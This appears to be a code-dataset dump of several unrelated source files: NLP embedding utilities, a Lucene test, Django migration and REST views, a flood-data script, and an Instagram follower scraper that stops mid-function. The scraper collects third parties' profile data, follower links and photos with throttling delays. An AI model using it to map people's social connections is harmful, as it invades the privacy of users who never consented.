hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6f4481f21ecbfcd293b7ed64ac82be4d1f1615b5 | 10,703 | py | Python | src/utils.py | AayushGrover/text_style_transfer | 3b8f3fe3080f60be4c190c8e1d8140b71aa4c492 | [
"MIT"
] | 2 | 2020-05-13T04:36:01.000Z | 2020-05-13T04:36:10.000Z | src/utils.py | AayushGrover/text_style_transfer | 3b8f3fe3080f60be4c190c8e1d8140b71aa4c492 | [
"MIT"
] | null | null | null | src/utils.py | AayushGrover/text_style_transfer | 3b8f3fe3080f60be4c190c8e1d8140b71aa4c492 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import torch
from transformers import BertModel, BertTokenizer, GPT2LMHeadModel, GPT2Tokenizer, pipeline
from sentence_transformers import SentenceTransformer
import config
class BertUtil():
def __init__(self, pretrained_weights=config.bert_pretrained_weights, max_length=config.max_length):
self.pretrained_weights = pretrained_weights
self.max_length = max_length
self.model = BertModel.from_pretrained(self.pretrained_weights)
self.model.to(config.device)
self.model.eval()
self.tokenizer = BertTokenizer.from_pretrained(self.pretrained_weights)
def _generate_input_ids(self, sentence):
encoded_dict = self.tokenizer.encode_plus(sentence, add_special_tokens=True, max_length=self.max_length, pad_to_max_length=True, return_tensors='pt')
input_ids = encoded_dict['input_ids'].to(config.device)
# shape(input_ids) = [1, max_length]
return input_ids
def _generate_cls_embedding(self, input_ids):
with torch.no_grad():
out = self.model(input_ids)[0] # disable grad for BERT model
cls_embedding = out[:, 0, :].squeeze(0).to(config.device)
# shape(cls_embedding) = [1, hidden_dim]
cls_embedding.requires_grad = True # enable grad (finetuning) for the vector obtained from the BERT model
return cls_embedding
def _generate_batch_cls_embeddings(self, batch_input_ids):
with torch.no_grad():
out = self.model(batch_input_ids)[0] # disable grad for BERT model
batch_cls_embeddings = out[:, 0, :].to(config.device)
# shape(batch_cls_embeddings) = [batch_size, hidden_dim]
batch_cls_embeddings.requires_grad = True # enable grad (finetuning) for the vector obtained from the BERT model
return batch_cls_embeddings
def _generate_word_embeddings(self, input_ids):
with torch.no_grad():
out = self.model(input_ids)[0].squeeze(0).to(config.device) # disable grad for BERT model
# shape(out) = [seq_len, hidden_dim]
out.requires_grad = True # enable grad (finetuning) for the vector obtained from the BERT model
return out
def _generate_batch_word_embeddings(self, batch_input_ids):
with torch.no_grad():
out = self.model(batch_input_ids)[0].to(config.device)
# shape(out) = [batch_size, seq_len, hidden_dim]
out.requires_grad = True # enable grad (finetuning) for the vector obtained from the BERT model
return out
def _generate_sentence_embedding(self, input_ids):
with torch.no_grad():
out = self.model(input_ids)[0].squeeze(0).to(config.device) # disable grad for BERT model
out = torch.sum(out[1:], dim=0) # sum all the word piece tokens in the seq (apart from the starting [CLS] token)
# shape(out) = [hidden_dim]
out.requires_grad = True # enable grad (finetuning) for the vector obtained from the BERT model
return out
def _generate_batch_sentence_embedding(self, batch_input_ids):
with torch.no_grad():
out = self.model(batch_input_ids)[0].to(config.device)
out = torch.sum(out[:, 1:, :], dim=1) # sum all the word piece tokens in the seq (apart from the starting [CLS] token)
# shape(out) = [batch_size, hidden_dim]
out.requires_grad = True # enable grad (finetuning) for the vector obtained from the BERT model
return out
def generate_cls_embedding(self, sentence):
input_ids = self._generate_input_ids(sentence)
cls_embedding = self._generate_cls_embedding(input_ids)
return cls_embedding
def generate_word_embeddings(self, sentence):
input_ids = self._generate_input_ids(sentence)
word_embeddings = self._generate_word_embeddings(input_ids)
return word_embeddings
def generate_sentence_embedding(self, sentence):
input_ids = self._generate_input_ids(sentence)
sentence_embedding = self._generate_sentence_embedding(input_ids)
return sentence_embedding
def generate_batch_cls_embeddings(self, batch_sentences):
l = list()
for sentence in batch_sentences:
l.append(self._generate_input_ids(sentence).squeeze(0))
batch_input_ids = torch.stack(l)
return self._generate_batch_cls_embeddings(batch_input_ids)
def generate_batch_word_embeddings(self, batch_sentences):
l = list()
for sentence in batch_sentences:
l.append(self._generate_input_ids(sentence).squeeze(0))
batch_input_ids = torch.stack(l)
return self._generate_batch_word_embeddings(batch_input_ids)
def generate_batch_sentence_embedding(self, batch_sentences):
l = list()
for sentence in batch_sentences:
l.append(self._generate_input_ids(sentence).squeeze(0))
batch_input_ids = torch.stack(l)
return self._generate_batch_sentence_embedding(batch_input_ids)
class SentenceBERTUtil():
def __init__(self, pretrained_weights=config.sentence_bert_pretrained):
self.pretrained_weights = pretrained_weights
self.model = SentenceTransformer(self.pretrained_weights, device=config.device)
self.model.eval()
def generate_sentence_embedding(self, sentence):
assert(type(sentence) == str)
with torch.no_grad():
sentence_embedding = np.array(self.model.encode([sentence], show_progress_bar=False))
sentence_embedding = torch.from_numpy(sentence_embedding).squeeze(0).to(config.device)
# shape(sentence_embedding) = [hidden_dim]
sentence_embedding.requires_grad = True # enable grad (finetuning) for the vector obtained from the Sentence-BERT model
return sentence_embedding
def generate_batch_sentence_embedding(self, batch_sentences):
with torch.no_grad():
batch_sentence_embeddings = np.array(self.model.encode(batch_sentences, show_progress_bar=False))
batch_sentence_embeddings = torch.from_numpy(batch_sentence_embeddings).to(config.device)
# shape(batch_sentence_embeddings) = [batch_size, hidden_dim]
batch_sentence_embeddings.requires_grad = True # enable grad (finetuning) for the vector obtained from the Sentence-BERT model
return batch_sentence_embeddings
class SentimentAnalysisUtil():
def __init__(self, SENTIMENTS=config.SENTIMENTS):
# leverages a fine-tuned model on sst2, which is a GLUE task.
self.nlp = pipeline('sentiment-analysis')
self.SENTIMENTS = SENTIMENTS
def _get_sentiment_label(self, sentence):
result = self.nlp(sentence)
sentiment_label = result[0]['label']
return sentiment_label
def _get_sentiment_vector(self, sentiment_label):
vec = torch.zeros(len(self.SENTIMENTS), dtype=torch.float, device=config.device)
vec[self.SENTIMENTS[sentiment_label]] = 1
# shape(vec) = [len(self.SENTIMENTS)] = [2]
return vec
def get_sentiment_vector(self, sentence):
sentiment_label = self._get_sentiment_label(sentence)
vec = self._get_sentiment_vector(sentiment_label)
return vec
def get_batch_sentiment_vectors(self, sentences):
l = list()
for sentence in sentences:
l.append(self.get_sentiment_vector(sentence))
vectors = torch.stack(l)
return vectors
def get_sentiment_vector_from_label(self, sentiment_label):
return self._get_sentiment_vector(sentiment_label)
def get_rand_target_sentiment(self):
target_sentiment = np.random.choice(list(self.SENTIMENTS))
return self._get_sentiment_vector(target_sentiment)
def get_const_positive_sentiment(self):
positive_str = 'POSITIVE'
assert(positive_str in self.SENTIMENTS)
return self._get_sentiment_vector(positive_str)
class GPT2Util():
def __init__(self, pretrained_weights=config.gpt2_pretrained_weights, max_length=config.max_length):
self.pretrained_weights = pretrained_weights
self.max_length = max_length
self.model = GPT2LMHeadModel.from_pretrained(self.pretrained_weights)
self.model.to(config.device)
self.model.eval()
self.tokenizer = GPT2Tokenizer.from_pretrained(self.pretrained_weights)
def batch_generate_sentence(self, inputs_embeds):
with torch.no_grad():
predictions = self.model(inputs_embeds=inputs_embeds)[0]
# shape(predictions) = [batch_size, max_length, gpt2_vocab_size]
batch_predicted_indices = torch.argmax(predictions, dim=2)
# argmax decoding introduces a lot of repetition
batch_seq = list()
for predicted_indices in batch_predicted_indices:
s = ''
for predicted_index in predicted_indices:
predicted_text = self.tokenizer.decode([predicted_index])
s += predicted_text
batch_seq.append(s)
return batch_seq
def generate_train_test_split(path=config.path, train_path=config.train_path, test_path=config.test_path):
d = pd.read_csv(path)
review = d.review
sentiment = d.sentiment
review_train, review_test, sentiment_train, sentiment_test = train_test_split(review, sentiment, test_size=0.3, random_state=42)
train_d = pd.DataFrame({'review': review_train, 'sentiment': sentiment_train})
test_d = pd.DataFrame({'review': review_test, 'sentiment': sentiment_test})
train_d.to_csv(train_path, index=False)
test_d.to_csv(test_path, index=False)
if __name__ == '__main__':
bert_util = BertUtil()
sentence_bert_util = SentenceBERTUtil()
sentence = 'Jim Henson was a puppeteer'
sentence_embedding = bert_util.generate_cls_embedding(sentence)
print('bert_cls_embedding.shape', sentence_embedding.shape)
sentence_embedding = bert_util.generate_sentence_embedding(sentence)
print('bert_sentence_embedding.shape', sentence_embedding.shape)
sentence_embedding = sentence_bert_util.generate_sentence_embedding(sentence)
print('sentence_bert_embedding.shape', sentence_embedding.shape)
# sentiment_analysis_util = SentimentAnalysisUtil()
# sentence = 'Sad'
# vec = sentiment_analysis_util.get_sentiment_vector(sentence)
# print(vec)
# inputs_embeds = torch.rand((config.batch_size, config.max_length, config.gpt2_dim)).to(config.device)
# gpt2_util = GPT2Util()
# print(gpt2_util.batch_generate_sentence(inputs_embeds))
# generate_train_test_split() | 45.739316 | 157 | 0.70924 |
e17bfdc7639273a12e99dfd7bdaf0320d766f472 | 2,960 | py | Python | test3/test_IndexDeletionPolicy.py | IreneZhou0129/PyLucene-assignment | 70916f1c8451c5dce5c5205915b25f214ffed2e4 | [
"Apache-2.0"
] | 5 | 2017-03-17T04:35:39.000Z | 2021-04-06T07:20:04.000Z | test3/test_IndexDeletionPolicy.py | IreneZhou0129/PyLucene-assignment | 70916f1c8451c5dce5c5205915b25f214ffed2e4 | [
"Apache-2.0"
] | null | null | null | test3/test_IndexDeletionPolicy.py | IreneZhou0129/PyLucene-assignment | 70916f1c8451c5dce5c5205915b25f214ffed2e4 | [
"Apache-2.0"
] | 1 | 2018-02-19T13:17:14.000Z | 2018-02-19T13:17:14.000Z | # ====================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ====================================================================
import sys, lucene, unittest
from PyLuceneTestCase import PyLuceneTestCase
from org.apache.lucene.analysis.core import WhitespaceAnalyzer
from org.apache.lucene.document import Document
from org.apache.lucene.index import DirectoryReader, IndexWriterConfig
from org.apache.pylucene.index import PythonIndexDeletionPolicy
class MyDeletionPolicy(PythonIndexDeletionPolicy):
onInitCalled = False
onCommitCalled = False
def onInit(self, commits):
self.onInitCalled = True
def onCommit(self, commits):
self.onCommitCalled = True
class IndexDeletionPolicyTestCase(PyLuceneTestCase):
def getConfig(self, analyzer):
self.policy = MyDeletionPolicy()
config = IndexWriterConfig(analyzer)
config.setIndexDeletionPolicy(self.policy)
return config
def testIndexDeletionPolicy(self):
writer = self.getWriter()
# no commits exist in the index yet
self.assertTrue(self.policy.onInitCalled)
# we haven't called commit yet
self.assertFalse(self.policy.onCommitCalled)
doc = Document()
writer.addDocument(doc)
writer.commit()
# now we called commit
self.assertTrue(self.policy.onCommitCalled)
# external IR sees 1 commit:
self.assertEqual(1, DirectoryReader.listCommits(self.directory).size())
# commit again:
writer.addDocument(doc)
writer.commit()
# external IR sees 2 commits:
self.assertEqual(2, DirectoryReader.listCommits(self.directory).size())
writer.close()
# open same index, make sure both commits survived:
writer = self.getWriter()
self.assertTrue(self.policy.onInitCalled)
self.assertFalse(self.policy.onCommitCalled)
self.assertEqual(2, DirectoryReader.listCommits(self.directory).size())
writer.close()
# 3 from closing writer again
self.assertEqual(3, DirectoryReader.listCommits(self.directory).size())
if __name__ == "__main__":
lucene.initVM()
if '-loop' in sys.argv:
sys.argv.remove('-loop')
while True:
try:
unittest.main()
except:
pass
else:
unittest.main()
| 30.833333 | 79 | 0.650676 |
cfc347c790eec74d842994c89929b7c029c01129 | 414 | py | Python | backend/account_request/migrations/0009_accountrequest_end_date.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | backend/account_request/migrations/0009_accountrequest_end_date.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | 2 | 2020-02-11T15:45:51.000Z | 2020-07-17T16:47:06.000Z | backend/account_request/migrations/0009_accountrequest_end_date.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-03-07 19:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account_request', '0008_accountrequest_comment'),
]
operations = [
migrations.AddField(
model_name='accountrequest',
name='end_date',
field=models.DateField(blank=True, null=True),
),
]
| 21.789474 | 59 | 0.618357 |
4924a919c4953d3478ded0d5e923cb0d90e77c0f | 1,028 | py | Python | Task1F.py | nicolerix/1A-Flood-risk-project | bd084a15abbd696813edb75fa824cfa8409e5c8f | [
"MIT"
] | null | null | null | Task1F.py | nicolerix/1A-Flood-risk-project | bd084a15abbd696813edb75fa824cfa8409e5c8f | [
"MIT"
] | null | null | null | Task1F.py | nicolerix/1A-Flood-risk-project | bd084a15abbd696813edb75fa824cfa8409e5c8f | [
"MIT"
] | null | null | null | #Identifying stations which have inconsitent data for typical high/low ranges (i).no data is available (ii).the typical high range is < typical low range reported
from cProfile import label
from floodsystem.stationdata import build_station_list
from floodsystem.station import inconsistent_typical_range_stations
from floodsystem.station import MonitoringStation
stations = build_station_list
# Add a fake station to test the consitency with typical range wrong way round
fake_station = MonitoringStation(
station_id= 'Fake Station',
measure_id= "hello",
label='Fake Station',
coord=(float(51), float(52))
typical_range=(float(52), float(12))
river="river",
town= "town" )
stations.append(fake_station)
inconsistent_stations= inconsistent_typical_range_stations(stations)
inconsistent_station_names = []
for station in inconsistent_stations:
inconsistent_station_names.append(station.name)
inconsistent_station_names = sorted(inconsistent_station_names)
print(inconsistent_station_names) | 36.714286 | 162 | 0.803502 |
46b0ca1f64a5b5d98f6f9415d5f49408746cc2d1 | 4,512 | py | Python | profiles_api/views.py | manuelmillares/profiles-rest-api | e3662533daef8172614f81686d277431e5f38aa6 | [
"MIT"
] | null | null | null | profiles_api/views.py | manuelmillares/profiles-rest-api | e3662533daef8172614f81686d277431e5f38aa6 | [
"MIT"
] | 6 | 2021-03-19T11:46:22.000Z | 2022-02-10T14:13:35.000Z | profiles_api/views.py | manuelmillares/profiles-rest-api | e3662533daef8172614f81686d277431e5f38aa6 | [
"MIT"
] | null | null | null | from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView):
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Return a list of APIView features"""
an_apiview = [
"Uses HTTP methods as function (get, post, put, patch, delete)",
"Is similar to a traditional Django View",
"Gives you the most control over your application logic",
"Is mapped manually to URLs"
]
return Response({'messagge': 'Hello', 'an_apiview': an_apiview})
def post(self, request):
"""Create a Hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handle a partial update of an object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delete an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a list of APIView features"""
a_viewset = [
'Uses action (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code'
]
return Response({'message': 'Hello', 'a_viewset': a_viewset})
def create(self, request):
"""Create a Hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle update an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle update part of an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
"""Handle creating and updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.object.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (permissions.UpdateOwnProfile,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', 'email',)
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication token"""
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handle creating, reading and updating profile feed items"""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (
permissions.UpdateOwnStatus,
IsAuthenticated
)
def perform_create(self, serializer):
"""Sets the user profile to the logged in user"""
serializer.save(user_profile=self.request.user)
| 33.924812 | 76 | 0.662677 |
96dcccfaa864ca4e78b71d76310a93910fd25d43 | 570 | py | Python | make_templates.py | kevinross/resume | 649f13b6ecaf53d0ce5b6d5e9c7fbd3f122580bd | [
"MIT"
] | null | null | null | make_templates.py | kevinross/resume | 649f13b6ecaf53d0ce5b6d5e9c7fbd3f122580bd | [
"MIT"
] | null | null | null | make_templates.py | kevinross/resume | 649f13b6ecaf53d0ce5b6d5e9c7fbd3f122580bd | [
"MIT"
] | null | null | null | import sys
sections = open('sections').read().splitlines()
def get_template(fm):
d = {'header': open('templates/%s/header' % fm).read()}
for i, v in enumerate(sections):
d['section%d' % (i+1)] = open('templates/%s/%s' % (fm, v)).read()
if len(sections) < 6:
for i in range(len(sections) + 1, 7):
d['section%d' % i] = ''
base = open('templates/%s/base' % fm).read()
for k, v in d.iteritems():
base = base.replace(k, v)
return base
t = sys.argv[1].replace('default_','').replace('.mustache','')
with open(sys.argv[1], 'w') as f:
f.write(get_template(t))
| 30 | 67 | 0.610526 |
b7cd0efb1b9a260897f734f5c77c0a586043c58a | 17,730 | py | Python | betterStats.py | Dominik-CH/InstagramRelationshipAnalytics | 260d3d22aeac2b181c5aeb1139811c77192c9095 | [
"MIT"
] | 4 | 2020-08-12T18:16:17.000Z | 2022-02-27T17:08:19.000Z | betterStats.py | Dominik-CH/InstagramRelationshipAnalytics | 260d3d22aeac2b181c5aeb1139811c77192c9095 | [
"MIT"
] | null | null | null | betterStats.py | Dominik-CH/InstagramRelationshipAnalytics | 260d3d22aeac2b181c5aeb1139811c77192c9095 | [
"MIT"
] | null | null | null | #https://github.com/realsirjoe/instagram-scraper/
from igramscraper.exception import InstagramException
from igramscraper.instagram import Instagram
from time import sleep
import time
import os
import requests
import sqlite3
import sys
import random
from config import USERNAME, PASSWORD, MAINPASSWORD, MAINUSERNAME
from dataAnalysis import DataAnalysis
from PIL import Image, ImageDraw, ImageFilter
class ModifiedInsta(Instagram):
def __init__(self):
Instagram.__init__(self)
self.dbName = None
def downloadProfilePicture(self,url, name):
if not os.path.exists("pictures"):
os.makedirs("pictures")
response = requests.get(url)
# picture = open(name+".jpg","wb")
# picture.write(response.content)
# picture.close()
with open(os.path.join("pictures", name + ".jpg"), 'wb') as temp_file:
temp_file.write(response.content)
def listMostRecentFollowers(self,maxInList=30,username=None,userID=None): #Zeigt die Follower an die dir am aktuellsten folgen
followers = []
if (username==None) and (userID == None):
print("Username oder ID müssen angegeben werden")
return False
if userID == None:
try:
account = instagram.get_account(username)
sleep(1)
followers = instagram.get_followers(account.identifier, maxInList+100, 100, delayed=True,
maxInList=maxInList) # Get 150 followers of 'kevin', 100 a time with random delay between requests
userID = account.identifier
except InstagramException as ex:
if ex.args[0][-3:] == "403":
print("User is private. Skipping User")
else:
print("Unknown error")
print(ex)
sys.exit(1)
except Exception:
print("Something went wrong")
elif username == None:
try:
sleep(1)
followers = instagram.get_followers(userID, maxInList+100, 100, delayed=True, #Die +100 ist nötig, da sonst die pageSize kleiner sein könnte als der count
maxInList=maxInList) # Get 150 followers of 'kevin', 100 a time with random delay between requests
except InstagramException as ex:
if ex.args[0][-3:] == "403":
print("User is private. Skipping User")
else:
print("Unknown error")
print(ex)
sys.exit(1)
except Exception:
print("Something went wrong")
try:
self.createDbEntryFollowers(followers["accounts"])
self.matchFollowersToBeingFollowed(userID,followers["accounts"])
self.setScrapedTrue(userID)
except Exception as e:
print(e)
print("Something went wrong")
print(followers)
def setScrapedTrue(self,instaID):
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""UPDATE userData SET scraped = ? WHERE instaID = ?""", (True,instaID,))
conn.commit()
conn.close()
def listMostRecentFollowing(self,maxInList=30,username=None,userID=None): #Zeigt die Liste der Personen denen ein user seit kürzester Zeit folgt
followings = []
if (username==None) and (userID == None):
print("Username oder ID müssen angegeben werden")
return False
if userID == None:
try:
account = instagram.get_account(username)
sleep(1)
followings = instagram.get_following(account.identifier, maxInList, 100, delayed=True,
maxInList=maxInList) # Get 150 followers of 'username', 100 a time with random delay between requests
userID = account.identifier
except InstagramException as ex:
if ex.args[0][-3:] == "403":
print("User is private. Skipping User")
else:
print("Unknown error")
print(ex)
sys.exit(1)
except Exception:
print("Something went wrong")
elif username == None:
try:
sleep(1)
followings = instagram.get_following(userID, maxInList, 100, delayed=True,
maxInList=maxInList)
except InstagramException as ex:
if ex.args[0][-3:] == "403":
print("User is private. Skipping User")
else:
print("Unknown error")
print(ex)
sys.exit(1)
except Exception:
print("Something went wrong")
try:
self.createDbEntryFollowers(followings["accounts"])
self.matchFollowingsToBeingFollowed(userID,followings["accounts"])
self.setScrapedTrue(userID)
except Exception as ex:
print(ex)
print("Something went wrong")
print(followings)
def matchFollowersToBeingFollowed(self,beingFollowedID,FollowerList): #FollowerID ist Liste
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
#Suchen welchen Key in userData beingFollowedID hat und dann schauen welchen Key FollowerID hat
beingFollowedKeyQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (beingFollowedID,))
beingFollowedKey = c.fetchone()[0]
print(beingFollowedKey)
for follower in FollowerList:
instaID = follower.identifier
followerQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (instaID,)) #extrahiert die Keys der Db
followerQueryKey = c.fetchone()[0]
matchingQuery = c.execute("""insert into whoFollowsWho (beingFollowed, follower) values (?,?)""", (beingFollowedKey,followerQueryKey,))
conn.commit()
conn.close()
def matchFollowingsToBeingFollowed(self,FollowingID,beingFollowedList): #Wem der aktuelle User gerade folgt ist in der Liste
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
#Suchen welchen Key in userData beingFollowedID hat und dann schauen welchen Key FollowerID hat
followingKeyQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (FollowingID,))
followingKey = c.fetchone()[0]
for follower in beingFollowedList:
instaID = follower.identifier
beingFollowedQuery = c.execute("""SELECT dbID from userData WHERE instaID = ?""", (instaID,)) #extrahiert die Keys der Db
beingFollowedKey = c.fetchone()[0]
matchingQuery = c.execute("""insert into whoFollowsWho (beingFollowed, follower) values (?,?)""",(beingFollowedKey, followingKey,))
conn.commit()
conn.close()
def getMainUserData(self,username): #Wichtig um einen User zu haben der im Mittelpunkt von allem steht
account = instagram.get_account(username)
self.createDbEntryFollowers([account]) #Muss liste sein cause of how createDbEntry works
return account.identifier #Rückgabe damit man die ID hat um die der anderen fkt zu geben
def createDbEntryFollowers(self,followersList): #Soll fungieren als Fkt direkt nachdem die Follower des Main Users extrahiert wurden. Die Daten werden in die Tabelle eingelesen damit sie einen KEy haben und im nächsten Schritt in WhoFollows who eingesetzt werden können
print("In DB Entry Followers")
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
followersIntoDB = []
for following in followersList:
profilPic = following.profile_pic_url
fullName = following.full_name
followerID = following.identifier
followerUsername = following.username
followerIsPrivate = following.is_private
infoFollower = (followerID,followerUsername,fullName,profilPic,followerIsPrivate,False,False,False,False)
print(infoFollower)
if self.checkIfInDB(followerID) == False:
print("Wird eingetragen")
followersIntoDB.append(infoFollower)
c.executemany('insert into userData (instaID, username, fullName, profilPicUrl, isPrivate, scraped, fromMainUser,picDownload,picNeeded) values (?,?,?,?,?,?,?,?,?)', followersIntoDB)#Speichert jedes Listen element der LISTE followerIntoDB in die Datenbank
conn.commit()
conn.close()
def checkIfInDB(self,instaID):
conn = sqlite3.connect(self.dbName)
print(instaID)
c = conn.cursor()
checkSQL = c.execute("""SELECT dbID FROM userData WHERE instaID = ?""", (instaID,))
checkIfInSQL = c.fetchone()
conn.close() # Vielleicht muss hier oben noch ein commit hin NICHT SICHER
if checkIfInSQL == None:
return False #Wenn False zurück gegeben wird ist der USER NICHT DRIN
print("Schon vorhanden in userData")
return True
def createDatabase(self):
dbName = str(int(time.time()))+'.db'
conn = sqlite3.connect(dbName)
c = conn.cursor()
c.execute('''CREATE TABLE userData
(dbID INTEGER PRIMARY KEY AUTOINCREMENT,instaID text, username text, fullName text, profilPicUrl text, mediaCount INTEGER, followerCount INTEGER, followingsCount INTEGER, isPrivate BOOLEAN, scraped BOOLEAN, fromMainUser BOOLEAN, picDownload BOOLEAN, picNeeded BOOLEAN)''') # Noch foreign key und datatypes anpassen
c.execute('''CREATE TABLE whoFollowsWho
(beingFollowed INTEGER, follower INTEGER , FOREIGN KEY(beingFollowed) REFERENCES userData(dbID), FOREIGN KEY(follower) REFERENCES userData(dbID))''') # Noch foreign key und datatypes anpassen
conn.commit()
conn.close()
self.dbName = dbName
return dbName
def startingProcess(self,username,mode=0,maxList=30): #Gathers base data to make further data aggregation possible (based on the given user)
#Datenbank erstellen
print("DB erstellt")
self.createDatabase()
# Erst eigenen User in die DB eintragen
print("Main user fetched")
self.getMainUserData(username=username)
if mode == 0:
print("Checking Followers")
self.listMostRecentFollowers(username=username,maxInList=maxList)
elif mode == 1:
print("Checking Followings")
self.listMostRecentFollowing(username=username,maxInList=maxList)
else:
print("Not an available mode!")
def getAllUsers(self,mode=0,maxList=30):
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""SELECT instaID FROM userData WHERE scraped = False AND fromMainUser = True""")
notScraped = c.fetchall()
print(notScraped)
for userID in notScraped:
print(userID)
if mode == 0:
print("Checking Followers")
print(userID[0])
self.listMostRecentFollowers(userID=userID[0],maxInList=maxList)
elif mode == 1:
print(userID[0])
print("Checking Followings")
self.listMostRecentFollowing(userID=userID[0],maxInList=maxList)
else:
print("Not an available mode!")
sleep(3)
conn.close()
def postProcessing(self):
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""UPDATE userData SET fromMainUser = ?""",(True,))
conn.commit()
conn.close()
def fromScratch(self,username,modeMain=0,modeFollowers=0,maxMainUser=30,maxSecondaryUser=30):
self.login(force=False,two_step_verificator=True)
sleep(2)
self.startingProcess(username,modeMain,maxMainUser)
print("Basics abgeschlossen")
self.postProcessing()
self.getAllUsers(modeFollowers,maxSecondaryUser)
def furtherAggregate(self,dbName,mode=0,maxSecondary=30):
self.dbName = dbName
self.getAllUsers(mode,maxSecondary)
def getPhotoData(self):
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""SELECT dbID,profilPicUrl FROM userData WHERE picDownload = False AND picNeeded = True""")
profilPicUrls = c.fetchall()
for picURL in profilPicUrls:
print(picURL)
self.downloadProfilePicture(picURL[1],str(picURL[0]))
c.execute("""UPDATE userData SET picDownload = ? WHERE dbID = ?""",(True,picURL[0],))
conn.commit()
rand = random.randint(0,3)
sleep(rand)
conn.close()
def setDbName(self,dbName):
self.dbName = dbName
def imageProcessing(self):
def crop_max_square(pil_img):
return crop_center(pil_img, min(pil_img.size), min(pil_img.size))
def crop_center(pil_img, crop_width, crop_height):
img_width, img_height = pil_img.size
return pil_img.crop(((img_width - crop_width) // 2,
(img_height - crop_height) // 2,
(img_width + crop_width) // 2,
(img_height + crop_height) // 2))
def mask_circle_transparent(pil_img, blur_radius, offset=0):
offset = blur_radius * 2 + offset
mask = Image.new("L", pil_img.size, 0)
draw = ImageDraw.Draw(mask)
draw.ellipse((offset, offset, pil_img.size[0] - offset, pil_img.size[1] - offset), fill=255)
mask = mask.filter(ImageFilter.GaussianBlur(blur_radius))
result = pil_img.copy()
result.putalpha(mask)
return result
path = os.getcwd()
print(path)
